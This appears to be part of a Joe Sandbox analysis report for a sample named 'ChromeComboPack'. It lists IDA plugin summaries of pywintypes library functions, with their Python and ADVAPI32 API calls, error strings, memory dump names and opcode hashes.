                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • LARGE_INTEGER must be 'int', or '(int, int)', xrefs: 00007FFD8A1963FE
                                                                                                                                                                                                                                                • Support for passing 2 integers to create a 64bit value is deprecated - pass a long instead, xrefs: 00007FFD8A1963C1
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Err_$Long$Arg_Long_OccurredParseStringTupleWarn
                                                                                                                                                                                                                                                • String ID: LARGE_INTEGER must be 'int', or '(int, int)'$Support for passing 2 integers to create a 64bit value is deprecated - pass a long instead
                                                                                                                                                                                                                                                • API String ID: 3944559157-3919795897
                                                                                                                                                                                                                                                • Opcode ID: 59b4d8ec125ac6524fe44f67723db926a36914beee4ad5eee682b635ad582c84
                                                                                                                                                                                                                                                • Instruction ID: 11ace18119466dfc0752b95a389641abe372318b1e29fb345939c1fe97d2cbe3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 59b4d8ec125ac6524fe44f67723db926a36914beee4ad5eee682b635ad582c84
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B8216032B09E4291EB54CF5AF4901696BB0FB88BD8F485171EBAD83768DE2DE485C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • PyErr_SetString.PYTHON312 ref: 00007FFD8A195958
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19CB50: PyNumber_Long.PYTHON312(?,?,?,00007FFD8A194F6E), ref: 00007FFD8A19CB65
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19CB50: PyErr_Occurred.PYTHON312(?,?,?,00007FFD8A194F6E), ref: 00007FFD8A19CB73
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19CB50: PyLong_AsLongLong.PYTHON312(?,?,?,00007FFD8A194F6E), ref: 00007FFD8A19CB81
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19CB50: PyErr_Occurred.PYTHON312(?,?,?,00007FFD8A194F6E), ref: 00007FFD8A19CB90
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19CB50: PyErr_Clear.PYTHON312(?,?,?,00007FFD8A194F6E), ref: 00007FFD8A19CB9B
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19CB50: PyLong_AsUnsignedLongLong.PYTHON312(?,?,?,00007FFD8A194F6E), ref: 00007FFD8A19CBA4
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19CB50: PyErr_Occurred.PYTHON312(?,?,?,00007FFD8A194F6E), ref: 00007FFD8A19CBB3
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19CB50: _Py_Dealloc.PYTHON312(?,?,?,00007FFD8A194F6E), ref: 00007FFD8A19CBC7
                                                                                                                                                                                                                                                  • Part of subcall function 00007FFD8A19CB50: PyErr_Format.PYTHON312(?,?,?,00007FFD8A194F6E), ref: 00007FFD8A19CBE6
                                                                                                                                                                                                                                                • PyErr_SetString.PYTHON312 ref: 00007FFD8A195999
                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32 ref: 00007FFD8A1959AC
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Err_$Long$Occurred$Long_String$ClearCloseDeallocFormatNumber_Unsigned
                                                                                                                                                                                                                                                • String ID: HANDLE must be a PyHKEY$PyHKEY$RegCloseKey$The object is not a PyHANDLE object
                                                                                                                                                                                                                                                • API String ID: 3516211060-2695813183
                                                                                                                                                                                                                                                • Opcode ID: d69c62bc09f853d0e6f1f910dfc9cb01cdd64d02257b89517463281ab8676dbe
                                                                                                                                                                                                                                                • Instruction ID: 7323a35297c90032fd4d7271541e46a68edddf507027fafc0ebda3b9865af67a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d69c62bc09f853d0e6f1f910dfc9cb01cdd64d02257b89517463281ab8676dbe
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CA218E23B1A942A1FB488F25D5B01796BA1FF88BA4F885071DA4E47664DE6CF589C300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DeallocErr_StringUnicode_strcmp
                                                                                                                                                                                                                                                • String ID: SECURITY_DESCRIPTOR$The object is not a PySECURITY_DESCRIPTOR object$can't delete SECURITY_ATTRIBUTES attributes
                                                                                                                                                                                                                                                • API String ID: 2499284733-1426751177
                                                                                                                                                                                                                                                • Opcode ID: 80ea741ab7d6b184c6713a1cdd19ccf7cb0727e26e110be3e3f3ef5f66facdf7
                                                                                                                                                                                                                                                • Instruction ID: c6937e8a49b0491de8928b5bd15a4661386831d557e47ab8f4db0fc193c3ca4e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 80ea741ab7d6b184c6713a1cdd19ccf7cb0727e26e110be3e3f3ef5f66facdf7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 91213D27B1AA42A1EA58CF16E8601386B60FF49FC4F4C51B1EA1E43B95DF2CF592C300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • lllO, xrefs: 00007FFD8A192354
                                                                                                                                                                                                                                                • EXPLICIT_ACCESS must be a dictionary containing {AccessPermissions:int,AccessMode:int,Inheritance:int,Trustee:<o PyTRUSTEE>}, xrefs: 00007FFD8A19238E
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Dealloc$Arg_Err_KeywordsParseStringTupleTuple_
                                                                                                                                                                                                                                                • String ID: EXPLICIT_ACCESS must be a dictionary containing {AccessPermissions:int,AccessMode:int,Inheritance:int,Trustee:<o PyTRUSTEE>}$lllO
                                                                                                                                                                                                                                                • API String ID: 959004690-1584370844
                                                                                                                                                                                                                                                • Opcode ID: cc2ae5c7b83a6cc19aa222611215686e05a02c5e12874075675e02da708e2e6c
                                                                                                                                                                                                                                                • Instruction ID: 516c3e291c4fc8594a225f284855b7f59609111ef5d2d63f98fa18385484f8d8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cc2ae5c7b83a6cc19aa222611215686e05a02c5e12874075675e02da708e2e6c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DC213E33B09B81A2DB588F11E55017DB7A4FB88B98F484276EA8E07B55DF3CE594C740
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Buffer_Err_Release$BufferFormatObject_String
                                                                                                                                                                                                                                                • String ID: Buffer cannot be None$Buffer length can be at most %d characters
                                                                                                                                                                                                                                                • API String ID: 1670810688-686265896
                                                                                                                                                                                                                                                • Opcode ID: 2eb95f7d662f013894336c9492278a8ccab15d0d485027fc4128c6d3b10bfa47
                                                                                                                                                                                                                                                • Instruction ID: b6134f3aa8b96e3148ceb6f9863963b27dd339c1a76f0e60f02a59b11855e8a1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2eb95f7d662f013894336c9492278a8ccab15d0d485027fc4128c6d3b10bfa47
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C6217F23B0BF42A4EB588F16E8602396BA0FB84F98F988071D94E47795DF3CE440C340
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • ULARGE_INTEGER must be 'int', or '(int, int)', xrefs: 00007FFD8A1964CA
                                                                                                                                                                                                                                                • Support for passing 2 integers to create a 64bit value is deprecated - pass a long instead, xrefs: 00007FFD8A1964EE
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Err_$Long$Arg_Long_OccurredParseStringTupleUnsignedWarn
                                                                                                                                                                                                                                                • String ID: Support for passing 2 integers to create a 64bit value is deprecated - pass a long instead$ULARGE_INTEGER must be 'int', or '(int, int)'
                                                                                                                                                                                                                                                • API String ID: 507489655-1767028231
                                                                                                                                                                                                                                                • Opcode ID: 5e223d211314823cd4219e8a22ccae8685cd212fbaa4b10fe60fb3027d068c0b
                                                                                                                                                                                                                                                • Instruction ID: 86efcb28d155bd79032d1f3ee4d71b58a0d29a10c419bde33fb0dd20a30b0452
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5e223d211314823cd4219e8a22ccae8685cd212fbaa4b10fe60fb3027d068c0b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9A21A433B0AA4291EB588F59F59017967A0FB88BA4F445171EB6D476A4EE3CE494C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Err_String$Bytes_FormatSize
                                                                                                                                                                                                                                                • String ID: Attributes of PyDEVMODEW can't be deleted$Length of DriverData cannot be longer that DriverExtra (%d bytes)
                                                                                                                                                                                                                                                • API String ID: 1818008259-1897733207
                                                                                                                                                                                                                                                • Opcode ID: 982261d07047ae27cc783b36b5d868306bdb719e0c94ce6eb0d46070b68470d5
                                                                                                                                                                                                                                                • Instruction ID: 1c7c7b42df3c494ca8757d7f89aba2c27e7b8ce5217d1f733bf4d5040b1b1f33
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 982261d07047ae27cc783b36b5d868306bdb719e0c94ce6eb0d46070b68470d5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F1118667F16A0291EB488F69E8A00B52B61FF84FE0B585271D92D477B4DE2CE4D5C300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Authority$Arg_CountErr_FromLongLong_ParseSizeStringTuple_
                                                                                                                                                                                                                                                • String ID: The index is out of range$i:GetSubAuthority
                                                                                                                                                                                                                                                • API String ID: 3635565364-2602025648
                                                                                                                                                                                                                                                • Opcode ID: ab6d8fd439d6b02b6a007d953e9cdef31c4b5c51f63db0275b9e0d2e0d69a080
                                                                                                                                                                                                                                                • Instruction ID: 3eb8f743ea5c385341bab4215787a221e97006f2eb759e03d1cc61732abee255
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ab6d8fd439d6b02b6a007d953e9cdef31c4b5c51f63db0275b9e0d2e0d69a080
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DDF0316AB0A602A2EB0C8F61E8640792761FF88F95F484071C95E07720DF3CF498C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DescriptorSecurityfree$DaclGroupOwnerSacl
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1788430091-0
                                                                                                                                                                                                                                                • Opcode ID: 97ea44e753a5a118efad6d5d1f8ef18c9434b446d72ae4c28109a967474ad096
                                                                                                                                                                                                                                                • Instruction ID: 21a05eaaf230f90e69430740d2f439ae2aeb717b349845c1d7deab6a4e261462
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 97ea44e753a5a118efad6d5d1f8ef18c9434b446d72ae4c28109a967474ad096
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1C216223B1EA43A2EF488F55E4603B96B64FF85B80F880072EA4E42964DF3CE549C704
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CallDeallocErr_FormatMethodObject_SubtypeType_
                                                                                                                                                                                                                                                • String ID: astimezone$must be a pywintypes time object (got %s)
                                                                                                                                                                                                                                                • API String ID: 244768906-1654730096
                                                                                                                                                                                                                                                • Opcode ID: 6c7939a9d9a4378991c112401e7defa9cb9dd7bc83bdd3f2906742f1b1d638e9
                                                                                                                                                                                                                                                • Instruction ID: fecf8090453f3ff0af7e3ce134095407b58b4da590bff000be8fc4b1739eb886
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6c7939a9d9a4378991c112401e7defa9cb9dd7bc83bdd3f2906742f1b1d638e9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9F21AE677096C2A2D74C8F66E5601787FA0FF49BC1B589076DAAE83360EE2CE158C711
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Arg_DescriptorParseSecurityTupleValid
                                                                                                                                                                                                                                                • String ID: :GetSecurityDescriptorSacl$GetSecurityDescriptorSacl$GetSecurityDescriptorSacl - invalid sd
                                                                                                                                                                                                                                                • API String ID: 1292091245-3167575759
                                                                                                                                                                                                                                                • Opcode ID: eda0f0d636285a1688c3aed3a31db8cfa39383af60a5d4deb98f50818e958fbb
                                                                                                                                                                                                                                                • Instruction ID: 65f15b4d07ec005392f7a595f59579075c165d6e3b1c4abf480de87a7a561bca
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eda0f0d636285a1688c3aed3a31db8cfa39383af60a5d4deb98f50818e958fbb
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 18116A5BF1A602A1FB498F25E8603B567A0BF84784F8C4471DD4D462A5EE7CF595C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Arg_DescriptorParseSecurityTupleValid
                                                                                                                                                                                                                                                • String ID: :GetSecurityDescriptorDacl$GetSecurityDescriptorDacl$SetSecurityDescriptorGroup - invalid sd
                                                                                                                                                                                                                                                • API String ID: 1292091245-161903415
                                                                                                                                                                                                                                                • Opcode ID: 47e204642db6640a9c9c5f42fc2bbdc1d812443fe2b31ebd05fa51a62c3ac94c
                                                                                                                                                                                                                                                • Instruction ID: 05dec15d4f26d414cf2e3f5f7069fe17a0d664f85c1ba970a1e13ef6076b7dd0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 47e204642db6640a9c9c5f42fc2bbdc1d812443fe2b31ebd05fa51a62c3ac94c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A611575BF1AA42A2FB499F25E8603B56760BF84744F8C4471DD4D46265EF3CF199C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorLastValidmalloc
                                                                                                                                                                                                                                                • String ID: PySID:$PySID: Invalid SID
                                                                                                                                                                                                                                                • API String ID: 814871005-2976353951
                                                                                                                                                                                                                                                • Opcode ID: 79f643a53b61f72d234d5fd2a4f80076a33712498731b2b7e024394af7ebc535
                                                                                                                                                                                                                                                • Instruction ID: 6e2ca2db00544d40ac54a32d2ec71012ef7598607a0615a795669fce6d8f3e55
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 79f643a53b61f72d234d5fd2a4f80076a33712498731b2b7e024394af7ebc535
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F121A466B1AB85A2DA488F11E5601B97761FB44FE0F485171DE6D037A4DF3CE094C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000022.00000002.4334440478.00007FFD8A191000.00000020.00000001.01000000.00000092.sdmp, Offset: 00007FFD8A190000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334365318.00007FFD8A190000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334522969.00007FFD8A1A0000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334594378.00007FFD8A1AE000.00000004.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000022.00000002.4334672429.00007FFD8A1B1000.00000002.00000001.01000000.00000092.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_7ffd8a190000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Arg_DescriptorParseSecurityTupleValid
                                                                                                                                                                                                                                                • String ID: :GetSecurityDescriptorGroup$GetSecurityDescriptorGroup$GetSecurityDescriptorGroup - invalid sd
                                                                                                                                                                                                                                                • API String ID: 1292091245-1740808346
                                                                                                                                                                                                                                                • Opcode ID: 1cfadc0fcdcf666d0f5f1b4dba48cf5ccd64742d80ab32fcdbb67db2515e5fcb
                                                                                                                                                                                                                                                • Instruction ID: 8334d63c89122f8ae378f171661598974369eaad9dbb6d6e2dd6eac5f2e81069
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1cfadc0fcdcf666d0f5f1b4dba48cf5ccd64742d80ab32fcdbb67db2515e5fcb
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 81114257F0AA02A2FB5C9F66E8613B527A0BF94B84F8C50B1DA0D46265EE2CF595C700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • PyArg_ParseTuple.PYTHON312 ref: 00007FFD8A19420E
                                                                                                                                                                                                                                                • GetAuditedPermissionsFromAclW.ADVAPI32 ref: 00007FFD8A19423E
                                                                                                                                                                                                                                                • Py_BuildValue.PYTHON312 ref: 00007FFD8A194268
